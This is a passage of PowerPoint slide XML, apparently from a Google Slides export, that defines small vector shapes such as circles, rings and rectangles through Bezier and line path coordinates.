                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D955FCB-A799-1CA5-723A-C943D8EDB0BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6004705" y="2292502"/>
              <a:ext cx="33323" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1690" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="845" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="0"/>
                    <a:pt x="1" y="388"/>
                    <a:pt x="1" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1324"/>
                    <a:pt x="389" y="1689"/>
                    <a:pt x="845" y="1689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="1689"/>
                    <a:pt x="1690" y="1324"/>
                    <a:pt x="1690" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="388"/>
                    <a:pt x="1302" y="0"/>
                    <a:pt x="845" y="0"/>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 name="Google Shape;1317;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C30DEA1-3771-15D1-A57F-18A64E492F2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5999303" y="2287099"/>
              <a:ext cx="44128" cy="44581"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2238" h="2261" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1119" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1416" y="571"/>
                    <a:pt x="1667" y="822"/>
                    <a:pt x="1667" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="1438"/>
                    <a:pt x="1416" y="1689"/>
                    <a:pt x="1119" y="1689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="1689"/>
                    <a:pt x="572" y="1438"/>
                    <a:pt x="572" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572" y="822"/>
                    <a:pt x="823" y="571"/>
                    <a:pt x="1119" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1119" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="0"/>
                    <a:pt x="1" y="502"/>
                    <a:pt x="1" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1735"/>
                    <a:pt x="503" y="2260"/>
                    <a:pt x="1119" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1736" y="2260"/>
                    <a:pt x="2238" y="1735"/>
                    <a:pt x="2238" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2238" y="502"/>
                    <a:pt x="1736" y="0"/>
                    <a:pt x="1119"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 name="Google Shape;1318;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BC168F-1347-E45E-28C5-4A337DDE5414}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429559" y="2071961"/>
              <a:ext cx="32889" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1668" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="845" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="1"/>
                    <a:pt x="1" y="389"/>
                    <a:pt x="1" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1302"/>
                    <a:pt x="366" y="1690"/>
                    <a:pt x="845" y="1690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="1690"/>
                    <a:pt x="1667" y="1302"/>
                    <a:pt x="1667" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="389"/>
                    <a:pt x="1302" y="1"/>
                    <a:pt x="845" y="1"/>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6" name="Google Shape;1319;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C316D3A-1932-4C8E-9815-FF8FE50D2F36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6423722" y="2066559"/>
              <a:ext cx="44562" cy="44128"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2260" h="2238" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1141" y="572"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1438" y="572"/>
                    <a:pt x="1689" y="823"/>
                    <a:pt x="1689" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="1439"/>
                    <a:pt x="1438" y="1667"/>
                    <a:pt x="1141" y="1667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="1667"/>
                    <a:pt x="571" y="1439"/>
                    <a:pt x="571" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="823"/>
                    <a:pt x="822" y="572"/>
                    <a:pt x="1141" y="572"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1141" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="502" y="1"/>
                    <a:pt x="0" y="503"/>
                    <a:pt x="0" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1736"/>
                    <a:pt x="502" y="2238"/>
                    <a:pt x="1141" y="2238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1758" y="2238"/>
                    <a:pt x="2260" y="1736"/>
                    <a:pt x="2260" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2260" y="503"/>
                    <a:pt x="1758" y="1"/>
                    <a:pt x="1141"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7" name="Google Shape;1320;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB17D66-5397-387F-4DEF-3B484A0D384A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6272942" y="2229938"/>
              <a:ext cx="33323" cy="32869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1690" h="1667" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="845" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="1"/>
                    <a:pt x="1" y="366"/>
                    <a:pt x="1" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1302"/>
                    <a:pt x="389" y="1667"/>
                    <a:pt x="845" y="1667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="1667"/>
                    <a:pt x="1690" y="1302"/>
                    <a:pt x="1690" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="366"/>
                    <a:pt x="1302" y="1"/>
                    <a:pt x="845" y="1"/>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8" name="Google Shape;1321;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B078CD9-10FD-20D4-00DC-624681993A27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6267540" y="2224082"/>
              <a:ext cx="44128" cy="44581"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2238" h="2261" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1119" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1416" y="571"/>
                    <a:pt x="1667" y="822"/>
                    <a:pt x="1667" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="1439"/>
                    <a:pt x="1416" y="1690"/>
                    <a:pt x="1119" y="1690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="1690"/>
                    <a:pt x="571" y="1439"/>
                    <a:pt x="571" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="822"/>
                    <a:pt x="823" y="571"/>
                    <a:pt x="1119" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1119" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1"/>
                    <a:pt x="1" y="503"/>
                    <a:pt x="1" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1758"/>
                    <a:pt x="503" y="2260"/>
                    <a:pt x="1119" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1736" y="2260"/>
                    <a:pt x="2238" y="1758"/>
                    <a:pt x="2238" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2238" y="503"/>
                    <a:pt x="1736" y="1"/>
                    <a:pt x="1119"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9" name="Google Shape;1322;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA34B1A-4DE8-8E2B-8C89-ED19E55513D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6529921" y="2189892"/>
              <a:ext cx="33342" cy="32869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1691" h="1667" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="846" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="0"/>
                    <a:pt x="1" y="365"/>
                    <a:pt x="1" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1301"/>
                    <a:pt x="366" y="1666"/>
                    <a:pt x="846" y="1666"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1302" y="1666"/>
                    <a:pt x="1690" y="1301"/>
                    <a:pt x="1690" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1690" y="365"/>
                    <a:pt x="1302" y="0"/>
                    <a:pt x="846" y="0"/>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0" name="Google Shape;1323;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFEC25A-16C1-CB26-353C-FC7E010215AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524085" y="2184036"/>
              <a:ext cx="44562" cy="44581"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2260" h="2261" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1142" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1438" y="571"/>
                    <a:pt x="1689" y="822"/>
                    <a:pt x="1689" y="1142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="1438"/>
                    <a:pt x="1438" y="1689"/>
                    <a:pt x="1142" y="1689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="1689"/>
                    <a:pt x="571" y="1438"/>
                    <a:pt x="571" y="1142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="822"/>
                    <a:pt x="822" y="571"/>
                    <a:pt x="1142" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1142" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="0"/>
                    <a:pt x="0" y="502"/>
                    <a:pt x="0" y="1142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1758"/>
                    <a:pt x="525" y="2260"/>
                    <a:pt x="1142" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1758" y="2260"/>
                    <a:pt x="2260" y="1758"/>
                    <a:pt x="2260" y="1142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2260" y="502"/>
                    <a:pt x="1758" y="0"/>
                    <a:pt x="1142"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1" name="Google Shape;1324;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7E8F8A-A20A-D056-D263-480E9515B8F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6140638" y="2030121"/>
              <a:ext cx="32869" cy="32869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1667" h="1667" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="822" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="0"/>
                    <a:pt x="0" y="365"/>
                    <a:pt x="0" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1301"/>
                    <a:pt x="365" y="1666"/>
                    <a:pt x="822" y="1666"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="1666"/>
                    <a:pt x="1666" y="1301"/>
                    <a:pt x="1666" y="822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1666" y="365"/>
                    <a:pt x="1301" y="0"/>
                    <a:pt x="822" y="0"/>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2" name="Google Shape;1325;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{070E3313-1BCD-59BD-E0D9-900BD51DE2F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134782" y="2024265"/>
              <a:ext cx="44581" cy="44581"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2261" h="2261" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1119" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1438" y="571"/>
                    <a:pt x="1689" y="822"/>
                    <a:pt x="1689" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="1438"/>
                    <a:pt x="1438" y="1689"/>
                    <a:pt x="1119" y="1689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="1689"/>
                    <a:pt x="571" y="1438"/>
                    <a:pt x="571" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="822"/>
                    <a:pt x="822" y="571"/>
                    <a:pt x="1119" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1119" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="0"/>
                    <a:pt x="0" y="503"/>
                    <a:pt x="0" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1758"/>
                    <a:pt x="503" y="2260"/>
                    <a:pt x="1119" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1758" y="2260"/>
                    <a:pt x="2260" y="1758"/>
                    <a:pt x="2260" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2260" y="503"/>
                    <a:pt x="1758" y="0"/>
                    <a:pt x="1119"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3" name="Google Shape;1326;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4925F8-104B-6238-C6A0-216CD11619CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6689258" y="2265942"/>
              <a:ext cx="33323" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1690" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="845" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="1"/>
                    <a:pt x="0" y="389"/>
                    <a:pt x="0" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1302"/>
                    <a:pt x="365" y="1690"/>
                    <a:pt x="845" y="1690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="1690"/>
                    <a:pt x="1689" y="1302"/>
                    <a:pt x="1689" y="845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="389"/>
                    <a:pt x="1301" y="1"/>
                    <a:pt x="845" y="1"/>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4" name="Google Shape;1327;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9DFEB5-A9AF-283A-9E9A-B5FF4E272EBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6683402" y="2260539"/>
              <a:ext cx="44581" cy="44128"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2261" h="2238" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1142" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1438" y="571"/>
                    <a:pt x="1689" y="822"/>
                    <a:pt x="1689" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="1416"/>
                    <a:pt x="1438" y="1667"/>
                    <a:pt x="1142" y="1667"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="1667"/>
                    <a:pt x="571" y="1416"/>
                    <a:pt x="571" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="822"/>
                    <a:pt x="822" y="571"/>
                    <a:pt x="1142" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1142" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1"/>
                    <a:pt x="0" y="503"/>
                    <a:pt x="0" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1735"/>
                    <a:pt x="503" y="2238"/>
                    <a:pt x="1142" y="2238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1758" y="2238"/>
                    <a:pt x="2260" y="1735"/>
                    <a:pt x="2260" y="1119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2260" y="503"/>
                    <a:pt x="1758" y="1"/>
                    <a:pt x="1142"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5" name="Google Shape;1328;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A3F1B8-4590-560C-204B-421C28964E52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6015964" y="2387007"/>
              <a:ext cx="695357" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="35266" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="1"/>
                    <a:pt x="0" y="137"/>
                    <a:pt x="0" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="457"/>
                    <a:pt x="115" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34992" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35151" y="571"/>
                    <a:pt x="35266" y="457"/>
                    <a:pt x="35266" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35266" y="137"/>
                    <a:pt x="35151" y="1"/>
                    <a:pt x="34992"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6" name="Google Shape;1329;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE561F76-BE35-F7B0-F6E4-8E995D6B6215}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6544788" y="1866288"/>
              <a:ext cx="262854" cy="45922"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="13331" h="2329" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13330" y="2329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13330"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7" name="Google Shape;1330;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF345FF7-5A11-690F-F871-158BAAF3A337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6673504" y="1934254"/>
              <a:ext cx="134138" cy="46376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6803" h="2352" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6802" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6802" y="0"/>
                  </a:ln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8" name="Google Shape;1331;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519B7AA0-C495-0482-3D1B-C3CFFC4CF161}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5850337" y="2564780"/>
              <a:ext cx="1007702" cy="592747"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51107" h="30062" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="30061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="30061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="1"/>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9" name="Google Shape;1332;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD21C55-4CAF-2151-51A2-8A58E3BFBF95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5850337" y="3133196"/>
              <a:ext cx="1007702" cy="24331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51107" h="1234" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="1"/>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0" name="Google Shape;1333;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB57DAE-3EF3-93A9-6C91-696D69493621}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892197" y="2606641"/>
              <a:ext cx="57634" cy="57615"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="2922" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
